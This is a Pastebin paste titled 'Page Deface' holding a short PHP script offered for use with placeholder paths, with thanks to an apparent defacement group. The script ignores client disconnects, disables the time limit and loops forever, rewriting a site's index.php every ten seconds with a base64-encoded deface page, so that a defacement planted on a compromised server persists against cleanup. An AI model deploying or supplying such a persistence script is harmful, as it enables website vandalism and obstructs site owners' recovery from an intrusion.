Advertisement
dhenyjarasandy

Page Deface

Jan 31st, 2015
208
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.21 KB | None | 0 0
  1. <?php
  2. ignore_user_abort(true);
  3. set_time_limit(0);
  4. while(true){
  5. file_put_contents("YOURPATH TO THE INDEX.php file.",base64_decode("YOURDEFACEPAGEINBASE64"));
  6. sleep(10);
  7. }
  8. ?>
  9.  
  10. -------------
  11.  
  12. Thanks :
  13. MaDLeeTs
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement